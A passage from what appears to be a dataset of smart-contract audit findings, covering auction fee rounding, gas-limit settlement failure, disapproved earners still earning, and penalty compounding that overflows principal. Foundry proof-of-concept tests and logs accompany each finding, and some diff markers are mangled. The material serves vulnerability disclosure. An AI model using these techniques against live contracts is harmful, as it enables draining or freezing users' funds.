unchecked {\\n=> totalInLessFees = purchased_ - toProtocol;\\n }\\n }\\n```\\n\\nHere purchased is the total quote token amount that was collected for this auction.\\nIn case the fees calculated in claimProceeds is less than the sum of fees allocated to the protocol / referrer via claimBids, there will be a mismatch causing the sum of (fees allocated + seller purchased quote tokens) to be greater than the total quote token amount that was transferred in for the auction. This could cause either the protocol/referrer to not obtain their rewards or the seller to not be able to claim the purchased tokens in case there are no excess quote token present in the auction house contract.\\nIn case, totalPurchased is >= sum of all individual bid quote token amounts (as it is supposed to be), the fee allocation would be correct. But due to the inaccurate computation of the input quote token amount associated with a partial fill, it is possible for the above scenario (ie. fees calculated in claimProceeds is less than the sum of fees allocated to the protocol / referrer via claimBids) to occur\\n```\\n function settle(uint96 lotId_) external override nonReentrant {\\n \\n // rest of code.\\n\\n if (settlement.pfBidder != address(0)) {\\n\\n _allocateQuoteFees(\\n feeData.protocolFee,\\n feeData.referrerFee,\\n settlement.pfReferrer,\\n routing.seller,\\n routing.quoteToken,\\n\\n // @audit this method of calculating the input quote token amount associated with a partial fill is not accurate\\n uint96(\\n=> Math.mulDivDown(\\n settlement.pfPayout, settlement.totalIn, settlement.totalOut\\n )\\n )\\n```\\n\\nThe above method of calculating the input token amount associated with a partial fill can cause this value to be higher than the acutal value and hence the fees allocated will be less than what the fees that will be captured from the seller will be\\nPOC\\nApply the following diff to `test/AuctionHouse/AuctionHouseTest.sol` and run `forge test --mt testHash_SpecificPartialRounding -vv`\\nIt is asserted that the tokens allocated as fees is greater than the tokens that will be captured from a seller for fees\\n```\\ndiff --git a/moonraker/test/AuctionHouse/AuctionHouseTest.sol b/moonraker/test/AuctionHouse/AuctionHouseTest.sol\\nindex 44e717d..9b32834 100644\\n--- a/moonraker/test/AuctionHouse/AuctionHouseTest.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/moonraker/test/AuctionHouse/AuctionHouseTest.sol\\n@@ -6,6 // Add the line below\\n6,8 @@ import {Test} from ""forge-std/Test.sol"";\\n import {ERC20} from ""solmate/tokens/ERC20.sol"";\\n import {Transfer} from ""src/lib/Transfer.sol"";\\n import {FixedPointMathLib} from ""solmate/utils/FixedPointMathLib.sol"";\\n// Add the line below\\nimport {SafeCastLib} from ""solmate/utils/SafeCastLib.sol"";\\n// Add the line below\\n\\n \\n // Mocks\\n import {MockAtomicAuctionModule} from ""test/modules/Auction/MockAtomicAuctionModule.sol"";\\n@@ -134,6 // Add the line below\\n136,158 @@ abstract contract AuctionHouseTest is Test, Permit2User {\\n _bidder = vm.addr(_bidderKey);\\n }\\n \\n// Add the line below\\n function testHash_SpecificPartialRounding() public {\\n// Add the line below\\n /*\\n// Add the line below\\n capacity 1056499719758481066\\n// Add the line below\\n previous total amount 1000000000000000000\\n// Add the line below\\n bid amount 2999999999999999999997\\n// Add the line below\\n price 2556460687578254783645\\n// Add the line below\\n fullFill 1173497411705521567\\n// Add the line below\\n excess 117388857750942341\\n// Add the line below\\n pfPayout 1056108553954579226\\n// Add the line below\\n pfRefund 300100000000000000633\\n// Add the line below\\n new totalAmountIn 2700899999999999999364\\n// Add the line below\\n usedContributionForQuoteFees 2699900000000000000698\\n// Add the line below\\n quoteTokens1 1000000\\n// Add the line below\\n quoteTokens2 2699900000\\n// Add the line below\\n quoteTokensAllocated 2700899999\\n// Add the line below\\n */\\n// Add the line below\\n\\n// Add the line below\\n uint bidAmount = 2999999999999999999997;\\n// Add the line below\\n uint marginalPrice = 2556460687578254783645;\\n// Add the line below\\n uint capacity = 1056499719758481066;\\n// Add the line below\\n uint previousTotalAmount = 1000000000000000000;\\n// Add the line below\\n uint baseScale = 1e18;\\n// Add the line below\\n\\n// Add the line below\\n // hasn't reached the capacity with previousTotalAmount\\n// Add the line below\\n assert(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(previousTotalAmount, baseScale, marginalPrice) <\\n// Add the line below\\n capacity\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n uint capacityExpended = FixedPointMathLib.mulDivDown(\\n// Add the line below\\n previousTotalAmount // Add the line below\\n bidAmount,\\n// Add the line below\\n baseScale,\\n// Add the line below\\n marginalPrice\\n// Add the line below\\n );\\n// Add the line below\\n assert(capacityExpended > capacity);\\n// Add the line below\\n\\n// Add the line below\\n uint totalAmountIn = previousTotalAmount // Add the line below\\n bidAmount;\\n// Add the line below\\n\\n// Add the line below\\n uint256 fullFill = FixedPointMathLib.mulDivDown(\\n// Add the line below\\n uint256(bidAmount),\\n// Add the line below\\n baseScale,\\n// Add the line below\\n marginalPrice\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n uint256 excess = capacityExpended - capacity;\\n// Add the line below\\n\\n// Add the line below\\n uint pfPayout = SafeCastLib.safeCastTo96(fullFill - excess);\\n// Add the line below\\n uint pfRefund = SafeCastLib.safeCastTo96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(uint256(bidAmount), excess, fullFill)\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n totalAmountIn -= pfRefund;\\n// Add the line below\\n\\n// Add the line below\\n uint usedContributionForQuoteFees;\\n// Add the line below\\n {\\n// Add the line below\\n uint totalOut = SafeCastLib.safeCastTo96(\\n// Add the line below\\n capacityExpended > capacity ? capacity : capacityExpended\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n usedContributionForQuoteFees = FixedPointMathLib.mulDivDown(\\n// Add the line below\\n pfPayout,\\n// Add the line below\\n totalAmountIn,\\n// Add the line below\\n totalOut\\n// Add the line below\\n );\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n {\\n// Add the line below\\n uint actualContribution = bidAmount - pfRefund;\\n// Add the line below\\n\\n// Add the line below\\n // acutal contribution is less than the usedContributionForQuoteFees\\n// Add the line below\\n assert(actualContribution < usedContributionForQuoteFees);\\n// Add the line below\\n console2.log(""actual contribution"", actualContribution);\\n// Add the line below\\n console2.log(\\n// Add the line below\\n ""used contribution for fees"",\\n// Add the line below\\n usedContributionForQuoteFees\\n// Add the line below\\n );\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n // calculating quote fees allocation\\n// Add the line below\\n // quote fees captured from the seller\\n// Add the line below\\n {\\n// Add the line below\\n (, uint96 quoteTokensAllocated) = calculateQuoteFees(\\n// Add the line below\\n 1e3,\\n// Add the line below\\n 0,\\n// Add the line below\\n false,\\n// Add the line below\\n SafeCastLib.safeCastTo96(totalAmountIn)\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // quote tokens that will be allocated for the earlier bid\\n// Add the line below\\n (, uint96 quoteTokens1) = calculateQuoteFees(\\n// Add the line below\\n 1e3,\\n// Add the line below\\n 0,\\n// Add the line below\\n false,\\n// Add the line below\\n SafeCastLib.safeCastTo96(previousTotalAmount)\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // quote tokens that will be allocated for the partial fill\\n// Add the line below\\n (, uint96 quoteTokens2) = calculateQuoteFees(\\n// Add the line below\\n 1e3,\\n// Add the line below\\n 0,\\n// Add the line below\\n false,\\n// Add the line below\\n SafeCastLib.safeCastTo96(usedContributionForQuoteFees)\\n// Add the line below\\n );\\n// Add the line below\\n \\n// Add the line below\\n console2.log(""quoteTokens1"", quoteTokens1);\\n// Add the line below\\n console2.log(""quoteTokens2"", quoteTokens2);\\n// Add the line below\\n console2.log(""quoteTokensAllocated"", quoteTokensAllocated);\\n// Add the line below\\n\\n// Add the line below\\n // quoteToken fees allocated is greater than what will be captured from seller\\n// Add the line below\\n assert(quoteTokens1 // Add the line below\\n quoteTokens2 > quoteTokensAllocated);\\n// Add the line below\\n }\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n function calculateQuoteFees(\\n// Add the line below\\n uint96 protocolFee_,\\n// Add the line below\\n uint96 referrerFee_,\\n// Add the line below\\n bool hasReferrer_,\\n// Add the line below\\n uint96 amount_\\n// Add the line below\\n ) public pure returns (uint96 toReferrer, uint96 toProtocol) {\\n// Add the line below\\n uint _FEE_DECIMALS = 5;\\n// Add the line below\\n uint96 feeDecimals = uint96(_FEE_DECIMALS);\\n// Add the line below\\n\\n// Add the line below\\n if (hasReferrer_) {\\n// Add the line below\\n // In this case we need to:\\n// Add the line below\\n // 1. Calculate referrer fee\\n// Add the line below\\n // 2. Calculate protocol fee as the total expected fee amount minus the referrer fee\\n// Add the line below\\n // to avoid issues with rounding from separate fee calculations\\n// Add the line below\\n toReferrer = uint96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(amount_, referrerFee_, feeDecimals)\\n// Add the line below\\n );\\n// Add the line below\\n toProtocol =\\n// Add the line below\\n uint96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(\\n// Add the line below\\n amount_,\\n// Add the line below\\n protocolFee_ // Add the line below\\n referrerFee_,\\n// Add the line below\\n feeDecimals\\n// Add the line below\\n )\\n// Add the line below\\n ) -\\n// Add the line below\\n toReferrer;\\n// Add the line below\\n } else {\\n// Add the line below\\n // If there is no referrer, the protocol gets the entire fee\\n// Add the line below\\n toProtocol = uint96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(\\n// Add the line below\\n amount_,\\n// Add the line below\\n protocolFee_ // Add the line below\\n referrerFee_,\\n// Add the line below\\n feeDecimals\\n// Add the line below\\n )\\n// Add the line below\\n );\\n// Add the line below\\n }\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n\\n // ===== Helper Functions ===== //\\n \\n function _mulDivUp(uint96 mul1_, uint96 mul2_, uint96 div_) internal pure returns (uint96) {\\n```\\n",Use `bidAmount - pfRefund` as the quote token input amount value instead of computing the current way,Rewards might not be collectible or seller might not be able to claim the proceeds due to lack of tokens,"```\\n function claimBids(uint96 lotId_, uint64[] calldata bidIds_) external override nonReentrant {\\n \\n // rest of code.\\n\\n for (uint256 i = 0; i < bidClaimsLen; i++) {\\n Auction.BidClaim memory bidClaim = bidClaims[i];\\n\\n if (bidClaim.payout > 0) {\\n \\n=> _allocateQuoteFees(\\n protocolFee,\\n referrerFee,\\n bidClaim.referrer,\\n routing.seller,\\n routing.quoteToken,\\n=> bidClaim.paid\\n );\\n```\\n" +Settlement of batch auction can exceed the gas limit,medium,"Settlement of batch auction can exceed the gas limit, making it impossible to settle the auction.\\nWhen a batch auction (EMPAM) is settled, to calculate the lot marginal price, the contract iterates over all bids until the capacity is reached or a bid below the minimum price is found.\\nAs some of the operations performed in the loop are gas-intensive, the contract may run out of gas if the number of bids is too high.\\nNote that additionally, there is another loop in the `_settle` function that iterates over all the remaining bids to delete them from the queue. While this loop consumes much less gas per iteration and would require the number of bids to be much higher to run out of gas, it adds to the problem.\\nChange the minimum bid percent to 0.1% in the `EmpaModuleTest` contract in `EMPAModuleTest.sol`.\\n```\\n// Remove the line below\\n uint24 internal constant _MIN_BID_PERCENT = 1000; // 1%\\n// Add the line below\\n uint24 internal constant _MIN_BID_PERCENT = 100; // 0.1%\\n```\\n\\nAdd the following code to the contract `EmpaModuleSettleTest` in `settle.t.sol` and run `forge test --mt test_settleOog`.\\n```\\nmodifier givenBidsCreated() {\\n uint96 amountOut = 0.01e18;\\n uint96 amountIn = 0.01e18;\\n uint256 numBids = 580;\\n\\n for (uint256 i = 0; i < numBids; i++) {\\n _createBid(_BIDDER, amountIn, amountOut);\\n }\\n \\n _;\\n}\\n\\nfunction test_settleOog() external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidsCreated\\n givenLotHasConcluded\\n givenPrivateKeyIsSubmitted\\n givenLotIsDecrypted\\n{ \\n uint256 gasBefore = gasleft();\\n _settle();\\n\\n assert(gasBefore - gasleft() > 30_000_000);\\n}\\n```\\n","An easy way to tackle the issue would be to change the `_MIN_BID_PERCENT` value from 10 (0.01%) to 1000 (1%) in the `EMPAM.sol` contract, which would limit the number of iterations to 100.\\nA more appropriate solution, if it is not acceptable to increase the min bid percent, would be to change the settlement logic so that can be handled in batches of bids to avoid running out of gas.\\nIn both cases, it would also be recommended to limit the number of decrypted bids that can be deleted from the queue in a single transaction.","Settlement of batch auction will revert, causing sellers and bidders to lose their funds.",```\\n// Remove the line below\\n uint24 internal constant _MIN_BID_PERCENT = 1000; // 1%\\n// Add the line below\\n uint24 internal constant _MIN_BID_PERCENT = 100; // 0.1%\\n```\\n +An earner can still continue earning even after being removed from the approved list.,medium,"An earner can still continue earning even after being removed from the approved list.\\nA `M` holder is eligible to earn the `Earner Rate` when they are approved by TTG. The approved `M` holder can call `startEarning()` then begin to earn the `Earner Rate`. They also can `stopEarning()` to quit earning.\\nHowever, when an approved `M` holder is disapproved, only the disapproved holder themselves can choose to stop earning; no one else has the authority to force them to quit earning.\\n`Earner Rate` is calculated in `StableEarnerRateModel#rate()` as below:\\n```\\n function rate() external view returns (uint256) {\\n uint256 safeEarnerRate_ = getSafeEarnerRate(\\n IMinterGateway(minterGateway).totalActiveOwedM(),\\n IMToken(mToken).totalEarningSupply(),\\n IMinterGateway(minterGateway).minterRate()\\n );\\n\\n return UIntMath.min256(maxRate(), (RATE_MULTIPLIER * safeEarnerRate_) / ONE);\\n }\\n\\n function getSafeEarnerRate(\\n uint240 totalActiveOwedM_,\\n uint240 totalEarningSupply_,\\n uint32 minterRate_\\n ) public pure returns (uint32) {\\n // solhint-disable max-line-length\\n // When `totalActiveOwedM_ >= totalEarningSupply_`, it is possible for the earner rate to be higher than the\\n // minter rate and still ensure cashflow safety over some period of time (`RATE_CONFIDENCE_INTERVAL`). To ensure\\n // cashflow safety, we start with `cashFlowOfActiveOwedM >= cashFlowOfEarningSupply` over some time `dt`.\\n // Effectively: p1 * (exp(rate1 * dt) - 1) >= p2 * (exp(rate2 * dt) - 1)\\n // So: rate2 <= ln(1 + (p1 * (exp(rate1 * dt) - 1)) / p2) / dt\\n // 1. totalActive * (delta_minterIndex - 1) >= totalEarning * (delta_earnerIndex - 1)\\n // 2. totalActive * (delta_minterIndex - 1) / totalEarning >= delta_earnerIndex - 1\\n // 3. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= delta_earnerIndex\\n // Substitute `delta_earnerIndex` with `exponent((earnerRate * dt) / SECONDS_PER_YEAR)`:\\n // 4. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= exponent((earnerRate * dt) / SECONDS_PER_YEAR)\\n // 5. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) >= (earnerRate * dt) / SECONDS_PER_YEAR\\n // 6. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) * SECONDS_PER_YEAR / dt >= earnerRate\\n\\n // When `totalActiveOwedM_ < totalEarningSupply_`, the instantaneous earner cash flow must be less than the\\n // instantaneous minter cash flow. To ensure instantaneous cashflow safety, we we use the derivatives of the\\n // previous starting inequality, and substitute `dt = 0`.\\n // Effectively: p1 * rate1 >= p2 * rate2\\n // So: rate2 <= p1 * rate1 / p2\\n // 1. totalActive * minterRate >= totalEarning * earnerRate\\n // 2. totalActive * minterRate / totalEarning >= earnerRate\\n // solhint-enable max-line-length\\n\\n if (totalActiveOwedM_ == 0) return 0;\\n\\n if (totalEarningSupply_ == 0) return type(uint32).max;\\n\\n if (totalActiveOwedM_ <= totalEarningSupply_) {//@audit-info rate is slashed\\n // NOTE: `totalActiveOwedM_ * minterRate_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n return uint32((uint256(totalActiveOwedM_) * minterRate_) / totalEarningSupply_);\\n }\\n\\n uint48 deltaMinterIndex_ = ContinuousIndexingMath.getContinuousIndex(\\n ContinuousIndexingMath.convertFromBasisPoints(minterRate_),\\n RATE_CONFIDENCE_INTERVAL\\n );//@audit-info deltaMinterIndex for 30 days\\n\\n // NOTE: `totalActiveOwedM_ * deltaMinterIndex_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n int256 lnArg_ = int256(\\n _EXP_SCALED_ONE +\\n ((uint256(totalActiveOwedM_) * (deltaMinterIndex_ - _EXP_SCALED_ONE)) / totalEarningSupply_)\\n );\\n\\n int256 lnResult_ = wadLn(lnArg_ * _WAD_TO_EXP_SCALER) / _WAD_TO_EXP_SCALER;\\n\\n uint256 expRate_ = (uint256(lnResult_) * ContinuousIndexingMath.SECONDS_PER_YEAR) / RATE_CONFIDENCE_INTERVAL;\\n\\n if (expRate_ > type(uint64).max) return type(uint32).max;\\n\\n // NOTE: Do not need to do `UIntMath.safe256` because it is known that `lnResult_` will not be negative.\\n uint40 safeRate_ = ContinuousIndexingMath.convertToBasisPoints(uint64(expRate_));\\n\\n return (safeRate_ > type(uint32).max) ? type(uint32).max : uint32(safeRate_);\\n }\\n```\\n\\nAs we can see, the rate may vary due to the changes in `MToken#totalEarningSupply()`, therefore the earning of fixed principal amount could be decreased if `totalEarningSupply()` increases. In some other cases the total earning rewards increases significantly if `totalEarningSupply()` increases, resulting in less `excessOwedM` sending to `ttgVault` when `MinterGateway#updateIndex()` is called.\\nCopy below codes to Integration.t.sol and run `forge test --match-test test_aliceStillEarnAfterDisapproved`\\n```\\n function test_AliceStillEarnAfterDisapproved() external {\\n\\n _registrar.updateConfig(MAX_EARNER_RATE, 40000);\\n _minterGateway.activateMinter(_minters[0]);\\n\\n uint256 collateral = 1_000_000e6;\\n _updateCollateral(_minters[0], collateral);\\n\\n _mintM(_minters[0], 400e6, _bob);\\n _mintM(_minters[0], 400e6, _alice);\\n uint aliceInitialBalance = _mToken.balanceOf(_alice);\\n uint bobInitialBalance = _mToken.balanceOf(_bob);\\n //@audit-info alice and bob had the same M balance\\n assertEq(aliceInitialBalance, bobInitialBalance);\\n //@audit-info alice and bob started earning\\n vm.prank(_alice);\\n _mToken.startEarning();\\n vm.prank(_bob);\\n _mToken.startEarning();\\n\\n vm.warp(block.timestamp + 1 days);\\n uint aliceEarningDay1 = _mToken.balanceOf(_alice) - aliceInitialBalance;\\n uint bobEarningDay1 = _mToken.balanceOf(_bob) - bobInitialBalance;\\n //@audit-info Alice and Bob have earned the same M in day 1\\n assertNotEq(aliceEarningDay1, 0);\\n assertEq(aliceEarningDay1, bobEarningDay1);\\n //@audit-info Alice was removed from earner list\\n _registrar.removeFromList(TTGRegistrarReader.EARNERS_LIST, _alice);\\n vm.warp(block.timestamp + 1 days);\\n uint aliceEarningDay2 = _mToken.balanceOf(_alice) - aliceInitialBalance - aliceEarningDay1;\\n uint bobEarningDay2 = _mToken.balanceOf(_bob) - bobInitialBalance - bobEarningDay1;\\n //@audit-info Alice still earned M in day 2 even she was removed from earner list, the amount of which is same as Bob's earning\\n assertNotEq(aliceEarningDay2, 0);\\n assertEq(aliceEarningDay2, bobEarningDay2);\\n\\n uint earnerRateBefore = _mToken.earnerRate();\\n //@audit-info Only Alice can stop herself from earning\\n vm.prank(_alice);\\n _mToken.stopEarning();\\n uint earnerRateAfter = _mToken.earnerRate();\\n //@audit-info The earning rate was almost doubled after Alice called `stopEarning`\\n assertApproxEqRel(earnerRateBefore*2, earnerRateAfter, 0.01e18);\\n vm.warp(block.timestamp + 1 days);\\n uint aliceEarningDay3 = _mToken.balanceOf(_alice) - aliceInitialBalance - aliceEarningDay1 - aliceEarningDay2;\\n uint bobEarningDay3 = _mToken.balanceOf(_bob) - bobInitialBalance - bobEarningDay1 - bobEarningDay2;\\n //@audit-info Alice earned nothing \\n assertEq(aliceEarningDay3, 0);\\n //@audit-info Bob's earnings on day 3 were almost twice as much as what he earned on day 2.\\n assertApproxEqRel(bobEarningDay2*2, bobEarningDay3, 0.01e18);\\n }\\n```\\n",Introduce a method that allows anyone to stop the disapproved earner from earning:\\n```\\n function stopEarning(address account_) external {\\n if (_isApprovedEarner(account_)) revert IsApprovedEarner();\\n _stopEarning(account_);\\n }\\n```\\n,The earnings of eligible users could potentially be diluted.\\nThe `excessOwedM` to ZERO vault holders could be diluted,"```\\n function rate() external view returns (uint256) {\\n uint256 safeEarnerRate_ = getSafeEarnerRate(\\n IMinterGateway(minterGateway).totalActiveOwedM(),\\n IMToken(mToken).totalEarningSupply(),\\n IMinterGateway(minterGateway).minterRate()\\n );\\n\\n return UIntMath.min256(maxRate(), (RATE_MULTIPLIER * safeEarnerRate_) / ONE);\\n }\\n\\n function getSafeEarnerRate(\\n uint240 totalActiveOwedM_,\\n uint240 totalEarningSupply_,\\n uint32 minterRate_\\n ) public pure returns (uint32) {\\n // solhint-disable max-line-length\\n // When `totalActiveOwedM_ >= totalEarningSupply_`, it is possible for the earner rate to be higher than the\\n // minter rate and still ensure cashflow safety over some period of time (`RATE_CONFIDENCE_INTERVAL`). To ensure\\n // cashflow safety, we start with `cashFlowOfActiveOwedM >= cashFlowOfEarningSupply` over some time `dt`.\\n // Effectively: p1 * (exp(rate1 * dt) - 1) >= p2 * (exp(rate2 * dt) - 1)\\n // So: rate2 <= ln(1 + (p1 * (exp(rate1 * dt) - 1)) / p2) / dt\\n // 1. totalActive * (delta_minterIndex - 1) >= totalEarning * (delta_earnerIndex - 1)\\n // 2. totalActive * (delta_minterIndex - 1) / totalEarning >= delta_earnerIndex - 1\\n // 3. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= delta_earnerIndex\\n // Substitute `delta_earnerIndex` with `exponent((earnerRate * dt) / SECONDS_PER_YEAR)`:\\n // 4. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= exponent((earnerRate * dt) / SECONDS_PER_YEAR)\\n // 5. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) >= (earnerRate * dt) / SECONDS_PER_YEAR\\n // 6. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) * SECONDS_PER_YEAR / dt >= earnerRate\\n\\n // When `totalActiveOwedM_ < totalEarningSupply_`, the instantaneous earner cash flow must be less than the\\n // instantaneous minter cash flow. To ensure instantaneous cashflow safety, we we use the derivatives of the\\n // previous starting inequality, and substitute `dt = 0`.\\n // Effectively: p1 * rate1 >= p2 * rate2\\n // So: rate2 <= p1 * rate1 / p2\\n // 1. totalActive * minterRate >= totalEarning * earnerRate\\n // 2. totalActive * minterRate / totalEarning >= earnerRate\\n // solhint-enable max-line-length\\n\\n if (totalActiveOwedM_ == 0) return 0;\\n\\n if (totalEarningSupply_ == 0) return type(uint32).max;\\n\\n if (totalActiveOwedM_ <= totalEarningSupply_) {//@audit-info rate is slashed\\n // NOTE: `totalActiveOwedM_ * minterRate_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n return uint32((uint256(totalActiveOwedM_) * minterRate_) / totalEarningSupply_);\\n }\\n\\n uint48 deltaMinterIndex_ = ContinuousIndexingMath.getContinuousIndex(\\n ContinuousIndexingMath.convertFromBasisPoints(minterRate_),\\n RATE_CONFIDENCE_INTERVAL\\n );//@audit-info deltaMinterIndex for 30 days\\n\\n // NOTE: `totalActiveOwedM_ * deltaMinterIndex_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n int256 lnArg_ = int256(\\n _EXP_SCALED_ONE +\\n ((uint256(totalActiveOwedM_) * (deltaMinterIndex_ - _EXP_SCALED_ONE)) / totalEarningSupply_)\\n );\\n\\n int256 lnResult_ = wadLn(lnArg_ * _WAD_TO_EXP_SCALER) / _WAD_TO_EXP_SCALER;\\n\\n uint256 expRate_ = (uint256(lnResult_) * ContinuousIndexingMath.SECONDS_PER_YEAR) / RATE_CONFIDENCE_INTERVAL;\\n\\n if (expRate_ > type(uint64).max) return type(uint32).max;\\n\\n // NOTE: Do not need to do `UIntMath.safe256` because it is known that `lnResult_` will not be negative.\\n uint40 safeRate_ = ContinuousIndexingMath.convertToBasisPoints(uint64(expRate_));\\n\\n return (safeRate_ > type(uint32).max) ? type(uint32).max : uint32(safeRate_);\\n }\\n```\\n" +"Malicious minters can repeatedly penalize their undercollateralized accounts in a short peroid of time, which can result in disfunctioning of critical protocol functions, such as `mintM`.",medium,"Malicious minters can exploit the `updateCollateral()` function to repeatedly penalize their undercollateralized accounts in a short peroid of time. This can make the `principalOfTotalActiveOwedM` to reach `uint112.max` limit, disfunctioning some critical functions, such as `mintM`.\\nThe `updateCollateral()` function allows minters to update their collateral status to the protocol, with penalties imposed in two scenarios:\\nA penalty is imposed for each missing collateral update interval.\\nA penalty is imposed if a minter is undercollateralized.\\nThe critical issue arises with the penalty for being undercollateralized, which is imposed on each call to `updateCollateral()`. This penalty is compounded, calculated as `penaltyRate * (principalOfActiveOwedM_ - principalOfMaxAllowedActiveOwedM_)`, and the `principalOfActiveOwedM_` increases with each imposed penalty.\\nProof Of Concept\\nWe can do a simple calculation, using the numbers from unit tests, mintRatio=90%, penaltyRate=1%, updateCollateralInterval=2000 (seconds). A malicious minter deposits `$100,000` t-bills as collateral, and mints `$90,000` M tokens. Since M tokens have 6 decimals, the collateral would be `100000e6`. Following the steps below, the malicious minter would be able to increase `principalOfActiveOwedM_` close to uint112.max limit:\\nDeposit collateral and mint M tokens.\\nWait for 4 collateral update intervals. This is for accumulating some initial penalty to get undercollateralized.\\nCall `updateCollateral()`. The penalty for missing updates would be `4 * 90000e6 * 1% = 36e8`.\\nStarting from `36e8`, we can keep calling `updateCollateral()` to compound penalty for undercollateralization. Each time would increase the penalty by 1%. We only need `log(2^112 / `36e8`, 1.01) ~ 5590` times to hit `uint112.max` limit.\\nAdd the following testing code to `MinterGateway.t.sol`. We can see in logs that `principalOfTotalActiveOwedM` has hit uint112.max limit.\\n```\\n penalty: 1 94536959275 94536000000\\n penalty: 2 95482328867 95481360000\\n penalty: 3 96437152156 96436173600\\n penalty: 4 97401523678 97400535336\\n penalty: 5 98375538914 98374540689\\n penalty: 6 99359294302 99358286095\\n penalty: 7 100352887244 100351868955\\n penalty: 8 101356416116 101355387644\\n penalty: 9 102369980277 102368941520\\n penalty: 10 103393680080 103392630935\\n // rest of code\\n penalty: 5990 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5991 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5992 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5993 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5994 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5995 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5996 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5997 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5998 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5999 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 6000 5192349545726433803396851311815959 5192296858534827628530496329220095\\n```\\n\\n```\\n // Using default test settings: mintRatio = 90%, penaltyRate = 1%, updateCollateralInterval = 2000.\\n function test_penaltyForUndercollateralization() external {\\n // 1. Minter1 deposits $100,000 t-bills, and mints 90,000 $M Tokens.\\n uint initialTimestamp = block.timestamp;\\n _minterGateway.setCollateralOf(_minter1, 100000e6);\\n _minterGateway.setUpdateTimestampOf(_minter1, initialTimestamp);\\n _minterGateway.setRawOwedMOf(_minter1, 90000e6);\\n _minterGateway.setPrincipalOfTotalActiveOwedM(90000e6);\\n\\n // 2. Minter does not update for 4 updateCollateralIntervals, causing penalty for missing updates.\\n vm.warp(initialTimestamp + 4 * _updateCollateralInterval);\\n\\n // 3. Minter fetches a lot of signatures from validator, each with different timestamp and calls `updateCollateral()` many times.\\n // Since the penalty for uncollateralization is counted every time, and would hit `uint112.max` at last.\\n uint256[] memory retrievalIds = new uint256[](0);\\n address[] memory validators = new address[](1);\\n validators[0] = _validator1;\\n\\n for (uint i = 1; i <= 6000; ++i) {\\n\\n uint256[] memory timestamps = new uint256[](1);\\n uint256 signatureTimestamp = initialTimestamp + i;\\n timestamps[0] = signatureTimestamp;\\n bytes[] memory signatures = new bytes[](1);\\n signatures[0] = _getCollateralUpdateSignature(\\n address(_minterGateway),\\n _minter1,\\n 100000e6,\\n retrievalIds,\\n bytes32(0),\\n signatureTimestamp,\\n _validator1Pk\\n );\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(100000e6, retrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n console.log(""penalty:"", i, _minterGateway.totalActiveOwedM(), _minterGateway.principalOfTotalActiveOwedM());\\n }\\n }\\n```\\n\\nNote that in real use case, the penalty rate may lower (e.g. 0.1%), however, `log(2^112 / 36e8, 1.001) ~ 55656` is still a reasonable amount since there are 1440 minutes in 1 day (not to mention if the frequency for signature may be higher than once per minute). A malicious minter can still gather enough signatures for the attack.",Consider only imposing penalty for undercollateralization for each update interval.,"The direct impact is that `principalOfTotalActiveOwedM` will hit `uint112.max` limit. All related protocol features would be disfunctioned, the most important one being `mintM`, since the function would revert if `principalOfTotalActiveOwedM` hits `uint112.max` limit.\\n```\\n unchecked {\\n uint256 newPrincipalOfTotalActiveOwedM_ = uint256(principalOfTotalActiveOwedM_) + principalAmount_;\\n\\n // As an edge case precaution, prevent a mint that, if all owed M (active and inactive) was converted to\\n // a principal active amount, would overflow the `uint112 principalOfTotalActiveOwedM`.\\n> if (\\n> // NOTE: Round the principal up for worst case.\\n> newPrincipalOfTotalActiveOwedM_ + _getPrincipalAmountRoundedUp(totalInactiveOwedM) >= type(uint112).max\\n> ) {\\n> revert OverflowsPrincipalOfTotalOwedM();\\n> }\\n\\n principalOfTotalActiveOwedM = uint112(newPrincipalOfTotalActiveOwedM_);\\n _rawOwedM[msg.sender] += principalAmount_; // Treat rawOwedM as principal since minter is active.\\n }\\n```\\n",```\\n penalty: 1 94536959275 94536000000\\n penalty: 2 95482328867 95481360000\\n penalty: 3 96437152156 96436173600\\n penalty: 4 97401523678 97400535336\\n penalty: 5 98375538914 98374540689\\n penalty: 6 99359294302 99358286095\\n penalty: 7 